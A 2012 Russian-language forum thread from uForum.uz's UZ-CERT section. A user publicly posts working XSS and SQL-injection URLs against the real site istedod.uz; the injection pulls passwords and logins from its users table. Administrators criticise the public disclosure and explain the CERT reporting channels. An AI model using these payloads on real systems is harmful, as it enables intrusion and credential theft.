Моё меню Общее меню Пользователи Правила форума Все прочитано
Вернуться   uForum.uz > GLOBAL > Информационная безопасность > UZ-CERT
Знаете ли Вы, что ...
...нарушения правил форума наказываются. Старайтесь их не нарушать.
<< Предыдущий совет - Случайный совет - Следующий совет >>

UZ-CERT Служба реагирования на компьютерные инциденты / Computer Emergency Response Team (cert.uz). Раздел UZINFOCOM


Ответить

 
Опции темы Опции просмотра
Старый 23.08.2012 23:15   #1  
Аватар для insider
Оффлайн
Engineer
Сообщений: 511
+ 45  169/112
– 0  12/9

Uzbekistan
Exclamation istedod.uz - XSS, SQL injection

Код:
http://istedod.uz/?page&pid=8--%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Код:
http://istedod.uz/?page&pid=8%20and%201=0%20union%20select%201,parol,3,login%20from%20users%20--
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка
Ответить 
Старый 24.08.2012 02:51   #2  
Аватар для Abdurohman
Оффлайн
Программист 1С
Сообщений: 1,391
+ 122  460/280
– 34  75/43

Uzbekistan
insider, Вы сообщили сперва владельцу сайта?!
Ответить 
Старый 24.08.2012 09:43   #3  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
Код:
http://istedod.uz/?page&pid=8--%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Код:
http://istedod.uz/?page&pid=8%20and%201=0%20union%20select%201,parol,3,login%20from%20users%20--
Было бы лучше, если бы Вы сообщали напрямую владельцам, либо в Службу UZ-CERT об обнаруженных угрозах на веб-сайтах в доменой зоне .UZ Публичное размещение уязвимостей, может повлечь за собой возможные взломы и компрометацию этих ресурсов, что может неблагоприятно сказаться на их работе.
Ответить 
"+" от:
Старый 24.08.2012 09:47   #4  
Real ID Group Ultimate uParty Member Администратор
Аватар для Eldar Ishimbaev
Оффлайн
UZINFOCOM
Заместитель директора
Сообщений: 4,901
+ 435  2,423/1,403
– 13  36/20

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Публичное размещение уязвимостей, может повлечь за собой возможные взломы и компрометацию этих ресурсов
Ну или проблемы для того, кто разместил данную информацию.
__________________
Вы всё ещё не знаете правил uForum?|Лица uForum'а|Закладки|Как отключить нежелательные разделы|RSS-ленты uForum'а|Статистика uForum'а
Ответить 
"+" от:
Старый 25.08.2012 08:21   #5  
Аватар для insider
Оффлайн
Engineer
Сообщений: 511
+ 45  169/112
– 0  12/9

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Публичное размещение уязвимостей, может повлечь за собой
немедленное исправление недостатков.

Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
либо в Службу UZ-CERT
http://cert.uz/incident/
а если я не собираюсь сообщать Место работы,Телефоны и всякую инфу ?
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка
Ответить 
Старый 25.08.2012 08:31   #6  
Аватар для insider
Оффлайн
Engineer
Сообщений: 511
+ 45  169/112
– 0  12/9

Uzbekistan
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка
Ответить 
Старый 25.08.2012 12:08   #7  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Публичное размещение уязвимостей, может повлечь за собой
немедленное исправление недостатков.

Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
либо в Службу UZ-CERT
http://cert.uz/incident/
а если я не собираюсь сообщать Место работы,Телефоны и всякую инфу ?
Если Вы не хотите сообщать данную информацию, можете отправить анонимное сообщение, указав вымышленные данные, либо написать на почтовый ящик cert@uzinfocom.uz.
Ответить 
Реклама и уведомления
Старый 25.08.2012 12:09   #8  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.
Ответить 
Старый 28.08.2012 10:20   #9  
Аватар для insider
Оффлайн
Engineer
Сообщений: 511
+ 45  169/112
– 0  12/9

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Цитата:
Сообщение от insider Посмотреть сообщение
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.
При отправке

Тема сообщения: freshmusic.uz - XSS
Ваше имя: insider
Место работы: ХХХ
Должность: ХХХ
Телефон, факс: 222-55-66
Электронная почта: aaa@aa.aa
Просим вас указать ... :
Код:
http://freshmusic.uz/abc.php?type= << XSS >>
Возникает ошибка.

Возможно стоит фильтр POST данных которая реагирует на некоторые ключевые слова.
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка

Последний раз редактировалось Dmitry Paleev; 28.08.2012 в 12:46.
Ответить 
Старый 28.08.2012 12:45   #10  
Real ID Group Администратор
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 958
+ 182  211/134
– 1  1/1

Uzbekistan
Цитата:
Сообщение от insider Посмотреть сообщение
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Цитата:
Сообщение от insider Посмотреть сообщение
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.
Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.
При отправке

Тема сообщения: freshmusic.uz - XSS
Ваше имя: insider
Место работы: ХХХ
Должность: ХХХ
Телефон, факс: 222-55-66
Электронная почта: aaa@aa.aa
Просим вас указать ... :

Возникает ошибка.

Возможно стоит фильтр POST данных которая реагирует на некоторые ключевые слова.
Вы правы, стоит фильтрация. В форме блокируется передача опасных символов. В случае, если вы хотите оповестить о наличии уязвимостей типа SQL, PHP, XSS с отправкой кода самой уязвимости, в этом случае рекомендуется писать на электронную почту cert@uzinfocom.uz.
Ответить 
Ответить
Опции темы
Опции просмотра




Здесь представлены форумы: UZINFOCOM, ЦППМП, ГКСИТТ, PC.UZ, Microsoft, IBM, HP, Fujitsu, D-Link, Intel, Ассоциация IT, InfoCOM.UZ, BANK.UZ, ActiveCloud, Sarkor Telecom, BUZTON, Cisco Systems, NetDec, EVO, Sharq Telekom, EPSON, Cron Telecom.
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
Центр UZINFOCOM


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх